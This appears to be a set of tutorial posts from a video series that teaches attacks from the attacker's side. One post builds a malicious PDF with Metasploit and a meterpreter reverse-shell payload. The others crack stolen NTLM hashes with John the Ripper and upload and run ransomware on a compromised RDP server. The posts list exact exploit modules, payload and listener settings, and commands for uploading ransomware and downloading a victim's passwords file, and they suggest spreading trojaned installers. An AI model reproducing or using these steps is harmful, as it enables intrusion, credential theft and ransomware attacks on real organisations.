How to make a malicious pdf (Making Malware)

If you’ve ever wondered what it takes to make basic malware, then this is for you.

Malware sounds like a dark art, but put simply malware is just a computer application that does something on your machine which enables a criminal to achieve their goal. You might have Word.exe on your computer for creating and writing documents, well malware might be something like passpad.exe which steals passwords from the machine. Simple, and malware is as easy to make as any computer application, it works within all the same parameters as a legit application, it just depends on how complicated it has to be to fulfill it’s purpose.

In this video tutorial we will show you how using free software you can create a simple malicious PDF. In this PDF we will hide our malware.

We first fire up metasploit to create our new pdf.

We perform a search of known vulnerabilities and exploits available for us to use, then once we have picked what we want to use we start creating the document that we’ll send to our victim hoping they run it. Once we have created our pdf we upload to a webserver where it will be downloaded by our victim. More often that not this will be sent as a link in an email, but we use this method here to keep the video short. (We will cover emailing malware in a future video)

You see the connection to the attackers machine instantly as soon as the document is opened. You’ll notice the extra pop up box before the document opens, but you’ll be surprised how many users just click through without reading them or being suspicious! Again this is simple malware, with more time we can eliminate the amount of user interaction required to make it almost silent. We can also add content to the pdf so it looks like a real document and not just blank. Again, we will work through creating more convincing malware in future tutorials.

Meterpreter commands used in this video are;

  1. search type:exploit platform:windows adobe pdf Simple search of the database for exploits for our chosen victim.
  2. use exploit/windows/fileformat/adobe_pdf_embedded_exe  This selects the chosen exploit.
  3. show options lists the options required to build the pdf
  4. set payload windows/meterpreter/reverse_tcp the malicious payload hidden in the pdf
  5. set FILENAME payroll2020.pdf name the pdf
  6. set LHOST 192.168.56.106 set the IP address of the attacking machine so the exploit knows where to call back to
  7. show info displays information about the exploit.
  8. run creates the pdf
  9. use exploit/multi/handler selects the listener which “listens” for the malware to call home to connect
  10. set payload windows/meterpreter/reverse_tcp this matches the payload hidden in the document and should connect to the same IP unless you are using VPNs or proxies.
  11. show options lists the options required for the listener and payload
  12. set LHOST 192.168.56.106 set the IP address of the attacking machine to listen on.
  13. run starts the listener
  14. sysinfo; this gives us the info of the infected system we are connected to.
  15. shell; this launches a hidden Windows command prompt which allows you to run native Windows commands. Which we use to launch “notepad.exe” and “calc.exe” as a demonstration that we are on the victim PC.

In future videos we’ll also show you how to spot this type of malware and stop it. Well I hope this has been useful, until next time.

Deploying Ransomware (Hacking RDP Servers Part 4)

I hope you have enjoyed this short series of RDP hacking. The aim was to show how quickly things can snow ball when just one user becomes compromised on a shared resource like an RDP server. Anyway, back to this last video in the series.

If you haven’t watched the previous videos and you are not sure how we got to this point, I’d recommend watching them so you are up to speed.

As a recap we have compromised the guest user on an RDP server, then dumped all available credentials from memory, we then cracked the hashes and see what other credentials we get.

We managed to crack 3 of the hashes giving us the logins for the following accounts;

  1. backup.adm
  2. server.adm
  3. thirdparty.adm

We logged in with thirdparty.adm as in general these accounts are poorly maintained, and not regularly used. There are also used by lot’s of different support engineers so changes or suspicious activity is unlikely to be noticed, whereas an admin for the company themselves are usually more diligent.

We want to copy over some malicious files but find that clipboard/copy and paste is disabled for this account meaning we need to find another way to get our files on the target machine.

We start another listener in metasploit, then manually browse back to our evil website which we used to compromise the guest account as we know this works and was not spotted previously.

We download and run the malware which gives us a backdoor into the machine.

We then use meterpreter to upload our ransomware file which we will use to encrypt the entire server, and also download any files of interest. We take passwords file (Although in reality we would take a copy of EVERYTHING) as vendors will often reuse credentials so we save these for if we come across this thirdparty again or perhaps use them to start a targeted attack against the third party vendor. We could also take the installer, inject it with malware then upload to a “freeware” site offering it with licence keys for download to help us infect more machines. Everything can be used in some way to help us in our malicious activities.

Meterpreter commands used in this video are;

  • upload RansomwareFile.Docx.bat c:\\users\\thirdparty.adm\\Documents\\RansomwareFile.docx.bat; Here we use the “upload” command, followed by our ransomware malware file, then state the location on the victim we wish to upload the file to. Note the double back slash.
  • download c:\\users\\thirdparty.adm\\Documents\\passwords.rft  Here we simply use the “download” command and state the file and location. Note the double back slash.

Once we have stolen all we want, we just need to run our malware. Now we want to ensure that it runs with the highest permissions so it has access to as much data across the machine as possible. This is where we will use the server.adm, or backup.adm accounts if we need them.

We right click to run our malicious file as administrator and bingo, we do not even need our other accounts. The third party account is running with local admin so our ransomware completes without issue. Success!

Hope you enjoy the video, and this series. We will pick a new topic and do another short series.

Cracking password hashes (Hacking RDP Servers Part 3)

In the 2 previous videos we have shown how by compromising just one user on an RDP server we can steal the hashed passwords of all logged in users. In part 3 we show how to crack those hashes to reveal the plain text passwords.

If you haven’t watched the previous videos and you are not sure how we got to this point, I’d recommend watching them so you are up to speed.

As a recap we have compromised the guest user on an RDP server, then dumped all available credentials from memory ready for us to crack the hashes and see what other credentials we get.

We copy these hashes over as shown in the video and save them in a file named “StolenCredsJohn” using the shown format of username:hash

We also have a file named “small-wordlist1.txt” which is a file of usernames we want to test against the hashes we have. There are of course massive wordslists which contain BILLIONS of passwords, however here we have carried out some intel of the victim organisation and found some details of previous breaches so have created a custom wordlist.

The program we are using to crack the hashes is John The Ripper. There are plenty of other programs out there but I prefer John which allows you to create custom rule sets and combine those with custom wordlists.

To use John we simply provide switches which state; NOTE you need double dashes to enable the switches below. They may display as single dashes below in some browsers, or may show as having a space between the dashes in others. It is shown clearly in the video below)

  • Hash type (NTLM, MD5, for example). – -format=
  • The file name of the stolen hashes
  • The file name of the wordlist we will use. – -wordlist=

The John The Ripper commands we use in this video are:

  • John – -format=NT – -wordlist=small-wordlist.txt StolenCredsJohn; use john to crack the hash file “StolenCredsJohn” using the wordlist “small-wordlist1.txt”
  • John – -show – -format=NT StolenCredsJohn show the cracked hashes from the file “StolenCredsJohn”

Once we have the cracked hashes we then use them to login to the RDP server undetected. Using legitimate credentials means there is nothing malicious for the Anti-Virus to detect.